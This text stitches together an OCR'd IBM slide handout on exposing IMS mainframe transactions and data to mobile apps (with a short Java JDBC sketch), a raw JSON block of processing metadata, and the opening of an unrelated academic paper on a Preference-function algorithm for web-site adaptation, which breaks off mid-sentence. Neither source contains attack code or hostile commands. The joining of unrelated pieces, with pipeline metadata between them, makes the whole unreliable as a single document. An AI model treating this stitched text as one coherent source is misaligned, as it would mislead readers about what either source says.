- WAS to IMS transactions uses the OTMA CI - IMS to WAS uses WOLA APIs and ESAF Enterprise Mobility … - WAS connectivity to back-end IMS transactions … - IBM Operational Decision Management (IBM ODM) - Previously WebSphere Operational Decision Management on z/OS (WODM) - Business rules management system (BRMS) and Business events Processor (BEP) - Detects events and event patterns in real-time to enable situational awareness and response of actionable situations - Automates the response of highly variable decisions based on the specific context of a process, transaction, or interaction. - Manages and governs rules-based decision logic separately from application code in order to provide better visibility, understanding, and maintainability compared to traditional application development Enterprise Mobility … - **Business Event Processing** - *Detects* when events or patterns of events occur to notify people or systems to take action - *Decides* business outcome through execution of business rules against available data - **IBM ODM and IMS** Enterprise Mobility … - **DataPower integration to IMS as a Service Provider** (XI50, XI50B, XI50z, XI52, XB60, XB62...) - **Three interfaces to get to IMS transactions:** - **IMS Connect Client** - Access to IMS applications using a DataPower embedded IMSClientConnect handler to IMS - **Connect** - CM1, Sync=none (Firmware 3.6.1) - Support for >32k with LLLL (3.8.0) - CM1, Sync=confirm (3.8.1) - **Soap** - Access to IMS web services via the IMS SOAP Gateway - **MQ Client** - Access to IMS applications using an MQ server on system z and the MQ Bridge for IMS - Newly announced support for IMS Callout and for the IMS Universal Drivers for DB Enterprise Mobility … - **DataPower …** - **Enhanced** capability with Firmware V6.0 (electronic availability 6/28/13) with XI52, XI52 Virtual Edition, XI50B, and XB62 - An “IMS Callout” front-side handler that natively connects to IMS Connect as service consumer Enterprise Mobility … - **DataPower** … - **Enhanced** WS access to IMS DB with Firmware V6.0 (electronic availability 6/28/13) - SOAP or REST call is mapped to a JDBC (DRDA) invocation - Leverages extensive Web Services security and management capabilities of DataPower to more securely expose critical data to the enterprise Enterprise Mobility... • Cognos 10.2 • Facilitates business decisions through the implementation of business intelligence (BI) and financial performance management (FPM) software • Allows decision makers to aggregate data from transaction systems (SAP, Oracle,… and now IMS.) along with other sources across the organization to create a single, integrated business performance management framework • With IMS • Allows IMS data to be integrated into this environment using the IMS Open Database solution and the IMS universal drivers • Using the Cognos generic JDBC driver interface IBM has been investing in the mobile space for more than a decade BUT In April of 2012, IBM announced a new portfolio that expanded IBM's strategy to provide clients with a mobile platform that spans application development, integration, security and management. 
www-01.ibm.com/support/docview.wss?uid=swg21590856 IBM Mobile Foundation Includes - IBM WebSphere Cast Iron - IBM Endpoint Manager for Mobile Devices - IBM Worklight Plus New Services - IBM Mobile Services Complementary Offerings - IBM solutions for Social Business - IBM Smarter Commerce - IBM Exceptional Web Experience - IBM Rational Collaborative Lifecycle Management IBM Mobile Foundation … • Packaging of several existing IBM tools and the new cross-platform mobile development and integration capabilities of Worklight • A mobile product family that allows organizations to: • Develop HTML5, hybrid and native apps once and deploy to multiple mobile environments without manual porting • Manage and secure network-connected devices, including mobile endpoints • Integrate mobile applications to enterprise systems and cloud services IBM Mobile Foundation … - Supports the development of mobile apps in four ways - Web Apps - Quick and low-cost development effort - Written entirely in HTML5, CSS and JavaScript code - Executed by the mobile browser and therefore cross-platform by default, but less powerful than native apps. - Hybrid Apps (Web) - The app's source code consists of web code executed within a native container that is provided by Worklight and consists of native libraries. - Hybrid Apps (Mix) - The web code is augmented with native language to create unique features and access native APIs that are not yet available via JavaScript, such as AR, NFC and others. - Native Apps - Platform-specific requiring unique expertise and knowledge - Pricey and time consuming to develop but delivers the highest user experience of all approaches. IBM Mobile Foundation … • **WebSphere Cast Iron** *(for IT Departments)* - Hybrid cloud technology that links mobile applications to clouds as well as back-end infrastructure and enterprise resources • **Worklight** *(for developers)* - A set of development and integration tools - Allows developers to write applications and other mobile software just once - *For deployment across Apple iOS, Google Android and Research In Motion's BlackBerry platform* • **IBM Endpoint Manager** *(for administrators)* - Software that spans servers to mobile devices and can carry out critical tasks such as wiping the data and applications off a mobile device when those resources could be at risk - Supports managing all types of endpoints on a network and making them secure IBM WebSphere Cast Iron - Deployed using - A physical appliance (WebSphere DataPower Cast Iron Appliance XH40) - A virtual appliance (WebSphere Cast Iron Hypervisor Edition) - Can be installed on existing servers using virtualization technology - A full cloud service (IBM Cast Iron Cloud) - Supports a variety of secure communication protocols: - HTTPS (HTTP over SSL) - SOAP/HTTP over SSL - Secure FTP (FTP over SSH) and FTPS (FTP over SSL or Implicit FTPS) - Secure Databases (SSL): Supports secure mechanism for database access IBM Worklight - **Apps Development** - Build once. Run anywhere. 
- Android, iOS, Blackberry, Microsoft, iGoogle, Facebook app, Adobe AIR - Runtime Skins for different resolutions - Standards based language - Application Lifecycle Management - Centralized Build Process - **Security** - Secured offline access - On device encryption of user data - Single sign-on mechanism - SSL encryption - Protection against reverse engineering vulnerabilities - Multi-factor authentication - **Enterprise Integration** - Direct access to back-end systems - Leverage existing SOA services - Server-side caching - Adapters with support for SAP, SOAP, REST, SQL and more - **Application Management** - App distribution - App Version management - Remote disabling apps - Direct Update - Push Notification service management - Analytics and Usage report - **Middleware** - WebSphere Application Server ND - Reliable, Highly Available and Scalable IBM Worklight - Includes Integration Adapters which - Allow the Worklight platform to connect to back-end systems - Retrieve information and Perform actions - Are provided with the product - HTTP adapter (supports REST and SOAP) - Cast Iron Adapter - SQL adapter - Supports data retrieval as either raw or preprocessed Worklight Adapters … - Worklight HTTP Adapter - Works with RESTful and SOAP-based services - Can read structured HTTP sources, for example RSS feeds - Allows sending a GET or POST HTTP request and retrieves data from the response headers and body - Easily customizable with simple server-side JavaScript - Optional server-side filtering - Retrieved data can be in XML, HTML, JSON, or plain text formats Worklight Adapters … - Worklight Cast Iron Adapter - Initiates orchestrations in Cast Iron to retrieve and return data to mobile clients - Takes advantage of Cast Iron implementations Worklight Adapters … - Worklight SQL Adapter - A Worklight® SQL adapter is designed to communicate with any SQL data source - Both plain SQL queries or stored procedures can be used - Supports MySQL, Oracle 11g and DB2® databases - Supports a JDBC connector driver for specific database type must be downloaded separately by the developer and added to the lib\ folder of a Worklight project - E.g., IMS universal driver Tooling (IDEs) - Rational Application Developer 8.5 (RAD) - Includes mobile web development tools for a pure web deployment - For developing applications, include mobile web applications, and deploying to WAS or WebSphere Portal - Programming models include JEE, OSGi, SCA, and Web 2.0 - IBM Worklight Studio 5 (IWS) - Includes tools for “mobile hybrid” development within a multi-channel architecture - For developing apps and deploying to smart phones and tablets - Programming model is HTML5 and JavaScript - *Uses a JavaScript-to-native bridge called Apache Cordova (formerly PhoneGap) so hybrid apps can access device capabilities without having to write in native platform languages* - Multi-channel architecture covers mobile devices, mobile web, desktop web and desktop widgets Enterprise Mobility Workload • Business to systems programmer • Scale using z/cloud and IMS Parallel Sysplex • Event processing for workload and error notification • IMS Monitoring tools • Current IMS security does not change • Just another endpoint IMSPlex – Parallel Server Environment Cloud + Mobile workload support - IMS is a dynamic and configurable platform - Provides standard interfaces to access resources - Does not require application program recompiles even if the IMS release is changed - Does not require application program changes even when the network or db 
structure changes Accessing IMS Transaction Resources MQ Telemetry Transport - MQTT - Optimized messaging for smart sensors and telemetry devices - Enables intelligent decision-making based on remote real-world events - Supports remote resource management of static or moving assets - MQTT is an open message protocol - Examples of usage include: Facebook Messenger, iPhone, Android, and Windows apps *Telemetry can be used to extend the enterprise to mobile devices* - Direct device integration into back office - Tiny messaging optimized for resource-constrained devices & gateways (RTUs) - Terse protocol & compact header for fragile & pay-per-byte networks - Advanced device-level data buffering - Event-driven publish-and-subscribe delivery of only significant information - Open protocol encourages widespread device enablement - Last Will & Testament for automated handling of device failures or outages http://tinyurl.com/9fyudba MQ Telemetry Transport – MQTT … - With WebSphere MQ Telemetry, instrumented devices that are located anywhere in the world can connect to each other - And with WebSphere MQ, they can connect to enterprise applications and web services - MQ Telemetry uses the MQTT protocol to send and receive messages between devices or applications and the WebSphere MQ queue manager - From the WebSphere MQ queue manager, messages can be exchanged with other messaging applications - Access to IMS transactions from WMQ - IMS MQ Bridge - IMS Adapter - Other IBM products that have applications and devices that communicate using the MQTT protocol - WebSphere Message Broker - WebSphere Application Server - IBM Operational Decision Management (IBM ODM) [Diagram of MQ Telemetry Transport – MQTT …] Accessing IMS Transactions – SOAP/HTTP … - WebSphere DataPower - Supports - Access to IMS web services via the IMS SOAP Gateway - Access to IMS applications using an MQ server on System z and the MQ Bridge for IMS - Access to IMS applications using a DataPower embedded IMSClientConnect handler to IMS Connect Accessing IMS Transactions – SOAP/HTTP … - WebSphere Message Broker - Connect FROM anywhere, TO anywhere - Simple & easy to install, learn, develop, deploy and manage - Visually map and transform between any two message or file formats http://tinyurl.com/9fyudba Accessing IMS Transactions – SOAP/HTTP ... - WebSphere Message Broker … - A powerful broker solution driven by business rules - Messages are formed, routed, and transformed according to the rules that you define - Allows diverse applications to exchange information in dissimilar forms - With brokers handling the processing required for the information to arrive in the right place in the correct format - The applications do not need to know anything except their own conventions and requirements.
- Implementation of an enterprise service bus architecture - Nodes - Communication points to external resources - Points in the message flow which define a set of actions Accessing IMS Transactions – SOAP/HTTP … - WebSphere Message Broker … - Provides two nodes to access IMS - MQ Node - Takes advantage of the WMQ support - MQPUT / MQGET - IMSRequest Node - Takes advantage of the IMS TM Resource Adapter - Accesses IMS through IMS Connect - Delivered/built into WMB - Supports WMB Configurable Services, which allow operational control of IMS connection configuration - Supports a broad range of IMS facilities - MPP, BMP and FP transaction regions - Commit mode 0, 1 - SyncLevel NONE, CONFIRM - Single and multi-segment IMS messages IMS Connect and IMS TM (Supports Mobile Devices) Accessing IMS Transactions – SOAP/HTTP • Enterprise Mobility means more transactions • Using communication mechanisms and interfaces that are already there for IMS • SOAP/HTTP adapters in Worklight or through Cast Iron • Can send messages to IMS through • IMS ES SOAP Gateway • WebSphere Application Server • WebSphere DataPower • WebSphere Message Broker • … Accessing IMS Transactions – SOAP/HTTP ... - IMS Enterprise Suite SOAP Gateway - A web services solution that enables IMS applications to interoperate outside of the IMS environment - Compliant with the industry standards for web services, including SOAP/HTTP 1.1 and Web Services Description Language (WSDL) 1.1 - By using the Worklight Server's HTTP/SOAP adapter, mobile applications can interoperate with the IMS environment Accessing IMS Transactions – SOAP/HTTP … - WebSphere solutions - Take advantage of the IMS TM Resource Adapter - Based on J2EE Connector Architecture (JCA) 1.5 - Leverages existing IMS assets in an SOA environment - Supports development of applications that can submit transactions to IMS Transaction Manager through IMS Connect Modernize MFS-based IMS transactions - Business values offered by IMS MFS on demand - Embedded command-line tooling - 3270 emulator and VTAM are no longer required - Render displays for web browsers and mobile devices, e.g. iPhone, iPad, etc. - Modernize MFS transactions without modifying existing applications [Diagram: a modern device (including mobile) with a web browser driving an MFS-based IMS transaction (IMS assembler or COBOL program) through IMS MFS Web Enablement, e.g. the IVTNO display/entry screens] Accessing IMS Transactions – IMS MFS WE - A style sheet is used to transform an MFS XML document into dynamic HTML pages that render data on a mobile browser - The MFS XML Utility is a tool that generates XMI files based on an MFS source file. It also generates a WAR file for deploying to WebSphere Application Server - The IMS MFS Adapter translates an MFS XML document into a byte stream that the IMS application can understand Examples – IMS MFS WE - A demo showing access to an IMS MFS transaction from the web browser on a mobile device IMS Application Event notification [Diagram: IMS asynchronous callout (ISRT ALTPCB request placed on the OTMA hold queue and delivered through IMS Connect, routed by an OTMA descriptor) and IMS synchronous callout (ICAL through OTMA and IMS Connect, routed by an OTMA descriptor) to an IBM Mobile Foundation client on a mobile device] How About Data?
IMS Connect and IMS DB (Supports Mobile Devices) IBM Worklight SQL Adapter - Development Studio - A Worklight® SQL adapter is designed to communicate with any SQL data source - Both plain SQL queries and stored procedures can be used - The IMS Universal JDBC connector driver can be added to the lib\ folder - Access IMS DB via Type 4 connectivity (see the JDBC sketch below) Worklight sample screen shots Examples - Access to IMS data from a mobile device
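To make the IMS DB access path above concrete, here is a minimal Java sketch of type 4 access through the IMS Universal JDBC driver, the same kind of call a Worklight SQL adapter would ultimately drive. It is a hedged illustration rather than an official sample: the driver class name, connection URL format, host, port, PSB name and the segment-as-table names are assumptions that must be checked against the IMS Universal drivers documentation for your release.

```java
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class ImsType4Sample {
    public static void main(String[] args) throws Exception {
        // Assumed driver class for the IMS Universal JDBC driver (from imsudb.jar);
        // newer driver levels may auto-register and not need this call.
        Class.forName("com.ibm.ims.jdbc.IMSDriver");

        // Hypothetical type 4 URL: host, ODBM/DRDA port and PSB name must match
        // your IMS Connect / ODBM configuration.
        String url = "jdbc:ims://imshost.example.com:5555/CUSTPSB";

        try (Connection conn = DriverManager.getConnection(url, "userid", "password");
             Statement stmt = conn.createStatement();
             // "CUSTOMER", "CUSTNAME" and "CUSTNO" are illustrative segment/field names.
             ResultSet rs = stmt.executeQuery("SELECT CUSTNAME, CUSTNO FROM CUSTOMER")) {
            while (rs.next()) {
                System.out.println(rs.getString("CUSTNAME") + " " + rs.getString("CUSTNO"));
            }
        }
    }
}
```

A mobile app would not normally issue this call itself; the JDBC work runs in the Worklight Server (or another middle tier), and the adapter hands the result set back to the device.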
{"Source-Url": "https://share.confex.com/share/121/webprogram/Handout/Session13990/Share13990_IMSEnterpriseMobility.pdf", "len_cl100k_base": 5182, "olmocr-version": "0.1.50", "pdf-total-pages": 53, "total-fallback-pages": 0, "total-input-tokens": 82126, "total-output-tokens": 7413, "length": "2e12", "weborganizer": {"__label__adult": 0.00075531005859375, "__label__art_design": 0.0004856586456298828, "__label__crime_law": 0.0004782676696777344, "__label__education_jobs": 0.0020732879638671875, "__label__entertainment": 0.0002428293228149414, "__label__fashion_beauty": 0.0003857612609863281, "__label__finance_business": 0.0189208984375, "__label__food_dining": 0.00043272972106933594, "__label__games": 0.0014486312866210938, "__label__hardware": 0.06732177734375, "__label__health": 0.0006670951843261719, "__label__history": 0.0004019737243652344, "__label__home_hobbies": 0.0001913309097290039, "__label__industrial": 0.0027027130126953125, "__label__literature": 0.0002440214157104492, "__label__politics": 0.000263214111328125, "__label__religion": 0.0004665851593017578, "__label__science_tech": 0.11383056640625, "__label__social_life": 8.118152618408203e-05, "__label__software": 0.1722412109375, "__label__software_dev": 0.61328125, "__label__sports_fitness": 0.0005984306335449219, "__label__transportation": 0.00235748291015625, "__label__travel": 0.0003261566162109375}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 24490, 0.00788]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 24490, 0.05817]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 24490, 0.82402]], "google_gemma-3-12b-it_contains_pii": [[0, 114, false], [114, 250, null], [250, 458, null], [458, 1611, null], [1611, 1868, null], [1868, 2032, null], [2032, 2645, null], [2645, 3547, null], [3547, 4079, null], [4079, 4560, null], [4560, 6330, null], [6330, 6759, null], [6759, 7254, null], [7254, 8001, null], [8001, 8375, null], [8375, 9130, null], [9130, 9399, null], [9399, 9737, null], [9737, 10331, null], [10331, 10648, null], [10648, 10972, null], [10972, 11448, null], [11448, 12289, null], [12289, 13076, null], [13076, 13628, null], [13628, 14609, null], [14609, 14951, null], [14951, 15378, null], [15378, 15570, null], [15570, 16005, null], [16005, 16822, null], [16822, 17085, null], [17085, 17431, null], [17431, 17467, null], [17467, 18428, null], [18428, 19348, null], [19348, 19673, null], [19673, 20003, null], [20003, 20702, null], [20702, 21323, null], [21323, 21372, null], [21372, 21758, null], [21758, 22196, null], [22196, 22540, null], [22540, 23168, null], [23168, 23580, null], [23580, 23690, null], [23690, 24047, null], [24047, 24063, null], [24063, 24112, null], [24112, 24409, null], [24409, 24439, null], [24439, 24490, null]], "google_gemma-3-12b-it_is_public_document": [[0, 114, true], [114, 250, null], [250, 458, null], [458, 1611, null], [1611, 1868, null], [1868, 2032, null], [2032, 2645, null], [2645, 3547, null], [3547, 4079, null], [4079, 4560, null], [4560, 6330, null], [6330, 6759, null], [6759, 7254, null], [7254, 8001, null], [8001, 8375, null], [8375, 9130, null], [9130, 9399, null], [9399, 9737, null], [9737, 10331, null], [10331, 10648, null], [10648, 10972, null], [10972, 11448, null], [11448, 12289, null], [12289, 13076, null], [13076, 13628, null], [13628, 14609, null], [14609, 14951, null], [14951, 15378, null], [15378, 15570, null], [15570, 16005, null], [16005, 16822, 
null], [16822, 17085, null], [17085, 17431, null], [17431, 17467, null], [17467, 18428, null], [18428, 19348, null], [19348, 19673, null], [19673, 20003, null], [20003, 20702, null], [20702, 21323, null], [21323, 21372, null], [21372, 21758, null], [21758, 22196, null], [22196, 22540, null], [22540, 23168, null], [23168, 23580, null], [23580, 23690, null], [23690, 24047, null], [24047, 24063, null], [24063, 24112, null], [24112, 24409, null], [24409, 24439, null], [24439, 24490, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 24490, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 24490, null]], "pdf_page_numbers": [[0, 114, 1], [114, 250, 2], [250, 458, 3], [458, 1611, 4], [1611, 1868, 5], [1868, 2032, 6], [2032, 2645, 7], [2645, 3547, 8], [3547, 4079, 9], [4079, 4560, 10], [4560, 6330, 11], [6330, 6759, 12], [6759, 7254, 13], [7254, 8001, 14], [8001, 8375, 15], [8375, 9130, 16], [9130, 9399, 17], [9399, 9737, 18], [9737, 10331, 19], [10331, 10648, 20], [10648, 10972, 21], [10972, 11448, 22], [11448, 12289, 23], [12289, 13076, 24], [13076, 13628, 25], [13628, 14609, 26], [14609, 14951, 27], [14951, 15378, 28], [15378, 15570, 29], [15570, 16005, 30], [16005, 16822, 31], [16822, 17085, 32], [17085, 17431, 33], [17431, 17467, 34], [17467, 18428, 35], [18428, 19348, 36], [19348, 19673, 37], [19673, 20003, 38], [20003, 20702, 39], [20702, 21323, 40], [21323, 21372, 41], [21372, 21758, 42], [21758, 22196, 43], [22196, 22540, 44], [22540, 23168, 45], [23168, 23580, 46], [23580, 23690, 47], [23690, 24047, 48], [24047, 24063, 49], [24063, 24112, 50], [24112, 24409, 51], [24409, 24439, 52], [24439, 24490, 53]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 24490, 0.0]]}
olmocr_science_pdfs
2024-11-30
2024-11-30
fc0ff3b8ba281caf6fb976d7b8eefd0f60babd82
AN EFFICIENT APPROACH FOR WEB-SITE ADAPTATION Seema Jani, Sam Makki Department of Electrical Engineering and Computer Science University of Toledo, Toledo, Ohio, USA Xiaohua Jia Department of Computer Science City University of Hong Kong, Kowloon, Hong Kong Keywords: Web personalization, Data mining, Graph, Probability, Clustering Abstract: This paper implements a novel approach defined as the Preference-function Algorithm (PFA) for web-site adaptation. The algorithm extracts future preferences from the users’ past web navigational activities. Server web logs are used to identify users’ navigation behaviours by examining the traverses of various web pages. In this approach, the sessions are modeled as a finite state graph, where each visited web page is defined as a state. Then, traversing among various states provides the framework for determining the interest of the users. 1 INTRODUCTION The continuous growth of the World Wide Web poses many challenging issues for a person using it. Most Web structures are large and complicated and users often miss the goal of their inquiry, or receive ambiguous results when they try to navigate through the web pages (Eirinaki et al., 2003). The business environment is such that in order to do well it is important to meet the needs of the customers and also create revenue by doing so. Therefore, the need to retain the attention of the users of a web-site and understand the needs of those users leads to the importance of analyzing the users’ behaviour. Once the behavior of the users is known, a company can use this information for a variety of objectives and actions such as, to personalize the web-site, make recommendations, enhance the web-site and target advertise. The objective of a Web personalization system is to “provide users with information they want or need, without expecting them to ask for it explicitly” (Mulvenna et al., 2000). Personalizing a web-site can be done in various ways. One way is to have the information provided by the users via questionnaires, surveys or registration forms. Another is to use demographic, geographic, or psychographic profiles or other information to divide or segment large populations into smaller groups. The last is to seek to understand the behavioral preferences of a specific, individual user and then deliver web-site content specifically targeted at that person. This is known as web usage mining (Eirinaki et al., 2003) and is the one that this paper targets. This method is more dynamic in nature and specifically takes into account the navigational tendencies of the user within a specific web-site. Web usage mining can be regarded as a three-phase process, consisting of the data preparation, pattern discovery, and pattern analysis phases (Srivastava et al., 2000). In the first phase, Web server log data is processed in order to identify users, sessions, pages viewed and so on. The first phase, or data preparation phase, is one of the most time-consuming, but technically straightforward tasks. In the second phase, methods such as those in the area of Statistics or Artificial Intelligence are applied to detect interesting patterns. The second phase is the most diverse and expanding of all three phases and has been the subject of continuing research and advancement. In the third phase of the Web usage mining process, these patterns are stored so that they can be further analyzed and applied. 
One main area of application is web-site adaptation, where information obtained from phase two is used in conjunction with specific web page relationships and actions. The relationships and actions are determined and provided by the owners of the website. 2 RELATED RESEARCH Pattern analysis in the context of Web usage mining has been the subject of numerous research projects. Two distinct directions are, in general, considered in Web usage mining research: Statistics and Artificial Intelligence techniques. The first approach using Statistics consists of a range of applications from overall analysis to an adapted version of statistical data mining techniques (Srivastava et al., 2000). These data mining techniques are those that mine for rules using the pre-defined support and confidence values. The second approach uses Artificial Intelligence techniques which draw upon methods and algorithms developed from machine learning and pattern recognition (Srivastava et al., 2000). 2.1 Statistical Mining Techniques The research and application of statistical techniques in the analysis of web usage data is a wide area. Three specific research areas are covered in this section. These are the overall statistics of the web usage data, probability analysis and standard data mining techniques. Statistical techniques are the most common method to extract knowledge about the users of a website. There are different levels of analysis which have been used from the area of Statistics in web mining. One general area is the use of overall statistical information, which is given by some software programs. Several commercial software packages such as Analog (Analog, 2004) and OLAP (The OLAP Report, 2005) are available for web log analysis. One more statistical approach which has been taken in the past research is the use of probability in the form of Markov chain modeling (Borges, 2004). Another well-known area of Statistics which has been used in the area of Web usage mining is the use of data mining techniques. These techniques involve finding association rules within a set of data and mining by determining the rules based on the rules’ confidence and support (Agrawal et al., 1994). One example of work done in this area is with the application of the “a priori” algorithm, in which the association rule mining searches for relationships between the items in the data. 2.2 Artificial Intelligence Techniques The second type of technique involves the use of Artificial Intelligence techniques such as clustering and classification. Clustering and classification are machine learning techniques that are used to group together a set of items having similar characteristics. In the Web Usage domain, there are two kinds of interesting clusters to be discovered: page clusters and usage clusters. Clustering of pages discovers groups of pages having related content. Clustering of users, however, tends to establish groups of users exhibiting similar browsing patterns. Classification is the task of mapping a data item into one of several predefined classes. Classification is done by using supervised inductive learning algorithms such as decision tree classifiers, naïve Bayes classifiers, k-nearest neighbor classifiers, Support Vector Machines, etc. Mobasher (Mobasher et al., 1999) modeled the profile based on the clustering approach and named it PACT, which stands for Profile Aggregations based on Clustering Transactions. The goal is to effectively capture common usage patterns from potentially anonymous click-stream data. 
The data is preprocessed and then used to create the profile. Preprocessing of the data is done in two steps: identifying users and determining pageviews. First, unique users are identified from the anonymous usage data. Erroneous or redundant pageviews are removed from the data. Second, pageviews are identified. Pageview identification is the task of determining which page file accesses contribute to a single browse display. Relevant pageviews are included in transaction files and weights are assigned to reflect the significance of the pageview. The clustering approach, however, requires that the structure of the web-site be known. Classification is also used to determine the user preferences (Baglioni et al., 2003). Classification algorithms require training data as input. In this example, the input is a set of cases whereby each case specifies values for a collection of attributes and for a class. The output of the classification algorithm is a model that describes or predicts the class value of a case on the basis of the values of the attributes of the case. The predictive accuracy of the extracted model is evaluated on a test set for which the actual class is known. This method requires registered users to provide information about themselves. The registered users' information is split so that 67% becomes the training set and 33% becomes the test set. The attributes of a case consist of the site pages or sections visited by the user, and the class is the user's sex. In this case the goal is to accurately determine the user's sex based on the web pages that the user visited. The classification accuracy of this approach is 54.8%. The major drawback is that the information about the users has to be obtained ahead of time. 3 OVERALL PROPOSAL To extract the related information from the users' log, we use a new approach called the Preference-function Algorithm. The Preference-function consists of two components defined as the Likeness-factor and the Time-factor. The Likeness-factor provides an overall idea as to whether or not a particular web page has been visited frequently by the user. The Time-factor provides the overall interest in that web page. These two components are further elaborated upon in the next few sections. Also, in this approach, knowledge of the structure of the web-site is not required because this knowledge will be gained from the user's specific actions. The overall process is divided into two steps as shown in Figures 1 and 2. ![Figure 1: Step 1 in Preference-function Web Mining](image) In step 1, the user profile is determined by first preprocessing the data, which is also known as data preparation; the specific usage mining is then performed using the Preference-function. The data preparation consists of creating useful information from the log files. It should be mentioned, however, that log files may contain many entries that are irrelevant or redundant for the mining task. Initially, the raw data is cleaned, which includes removing all redundant or unnecessary information. All information relating to image files and map files, which exist in the log files, is irrelevant to identifying the user's behavior. Then, the sessions and transactions are identified based on the available data. For our experiment we consider a session length of a 6-hour period; a session starts when the first page is requested from a designated web-site.
The end of the session will be determined when the user leaves the web-site, or when the time on one web page has exceeded 30 minutes. The 30-minute timeout assumption is based on the results from Catledge and Pitkow (Catledge et al., 1995). Various transactions can occur during each session. Individual entries for page accesses are grouped into meaningful transactions. The transactions are first defined as being unique and are grouped together based on the IP addresses, since any access from different IP addresses is identified as a different transaction. Step 2, as shown in Figure 2, involves making recommendations based on a company-provided scenario. In the case of this experiment, the web-site owner will include suggested actions in the scenario. ![Figure 2: Step 2 in Preference-function Web Mining](image) 3.1 Preference-function (PF) Because the topology of the web-site is not known, information in the server log will provide a way to reconstruct a partial topology. The following assumptions will provide a framework for analyzing the server logs: - A session starts when the first page of a designated web-site is requested from any IP address. - The beginning of a user session is determined to be the first time a unique IP address is observed. - The end of the session is determined when the user has left the web-site or when a timeout of 30 minutes has been exceeded on one web page. - Each unique IP address will be compared with those that share the same operating system. - Previously visited web pages are allowed. Relevant information will be extracted from the server logs and combined to form a Preference-function (PF). The Preference-function is composed of the product of two variables: the Likeness-factor and the Time-factor. 3.2 Likeness-factor (LF) In this paper, the sessions are modeled as a finite state machine with each web page visited within a web-site defined as a state. Two additional states, S and F, are added to denote the start and final states. The transition from each state to the next is denoted as an edge on a weighted directed graph. The Likeness-factor is determined by summing the path weights (pw) of the individual paths that were used to reach a particular state. The path weights are defined as follows: each unique path toward a particular state is by definition given a partial path weight of 1; any repetition that takes place, such as leaving the current page and then returning, is given a partial path weight of ½; and the total path weight for the path is determined by summing the partial path weight of the unique path plus that of each of the various detours. The Likeness-factor (LF) is determined by adding the various path weights to a particular state. The path weight of a state (s) is given in equation (1), where "n" is the number of detours once the specified state is reached and \( \text{pw}_i \) is the partial weight (½) contributed by detour i: \[ \text{pw}_s = 1 + \sum_{i=1}^{n} \text{pw}_i \] (1) The formula for the Likeness-factor is given by summing up all the path weights of all the paths (m) to a particular state (s): \[ \text{LF}_s = \sum_{j=1}^{m} \text{pw}_{sj} \] (2) 3.3 Time-factor (TF) The reference length approach (Cooley et al., 1997) is based on the assumption that the amount of time a user spends examining an object is related to the interest of the user in the object's contents.
On this basis, a model for user sessions is obtained by distinguishing the navigational objects (i.e., containing only links interesting to the user) from the content objects (i.e., containing the information the user was looking for). The distinction between navigational and content accesses is related to the distance (in time) between one request and the next. This Time-factor is added to the evaluation function which was developed above in (1) and (2). The Time-factor (TF) considers that, generally, the more time a user spends on a web page, the higher the interest the user has in the information on that page. Therefore, the TF of a web page is determined by dividing the time (in seconds) spent at that web page (determined from the web server logs) by the total time for the session. The formula for TF is shown in equation (3), where "l" is the total number of states and "p" is the number of times that the state "s" appears: \[ \text{TF}_s = \frac{\sum_{k=1}^{p} t_{sk}}{\sum_{k=1}^{l} t_{k}} \] (3) 3.4 Overall Equation From equations (2) and (3) we can compute the Preference-function as follows: \[ \text{PF}_s = \text{LF}_s \times \text{TF}_s \] (4) 3.5 Example Suppose we have a web-site which consists of web pages A, B and C, and based on the server log it is known that a unique user used the following paths: \[ \{A \rightarrow B \rightarrow C \rightarrow B\} \] \[ \{A \rightarrow C \rightarrow B \rightarrow C \rightarrow C\} \] \[ \{B \rightarrow C \rightarrow B\} \] \[ \{C \rightarrow A \rightarrow B\} \] - For the first path, the unique path \( S \rightarrow A \rightarrow B \) contributes a partial weight of 1 and the detour \( B \rightarrow C \rightarrow B \) contributes ½, so \( \text{pw}_{B1} = 1 + \tfrac{1}{2} = 1\tfrac{1}{2} \). - For the second path, the unique path \( S \rightarrow A \rightarrow C \rightarrow B \) contributes 1 and there is no detour back to B, so \( \text{pw}_{B2} = 1 \). - For the third path, the unique path \( S \rightarrow B \) contributes 1 and the detour \( B \rightarrow C \rightarrow B \) contributes ½, so \( \text{pw}_{B3} = 1 + \tfrac{1}{2} = 1\tfrac{1}{2} \). - For the fourth path, the unique path \( S \rightarrow C \rightarrow A \rightarrow B \) contributes 1, so \( \text{pw}_{B4} = 1 \). Therefore the Likeness-factor for page B is \[ \text{LF}_B = \text{pw}_{B1} + \text{pw}_{B2} + \text{pw}_{B3} + \text{pw}_{B4} = 1\tfrac{1}{2} + 1 + 1\tfrac{1}{2} + 1 = 5 \] [Figure: the overall weighted directed graph built from these paths] Also based on the server log, it is known that the user spent 10 secs in A, 240 secs in B and 600 secs in C, for a total of 850 secs. Then the TF for each of the web pages becomes \[ \begin{align*} TF(A) &= \frac{10}{850} = 0.012 \\ TF(B) &= \frac{240}{850} = 0.282 \\ TF(C) &= \frac{600}{850} = 0.706 \end{align*} \] Therefore the Preference-function for web page B would be: \[ \text{PF}_B = \text{LF}_B \times \text{TF}_B = 5 \times 0.282 = 1.41 \] 4 PROGRAMMING DESIGN AND IMPLEMENTATION 4.1 Programming Language Choice The programming language Java was used in creating the Preference-function Web Mining program. Several other programming languages such as C++, Visual 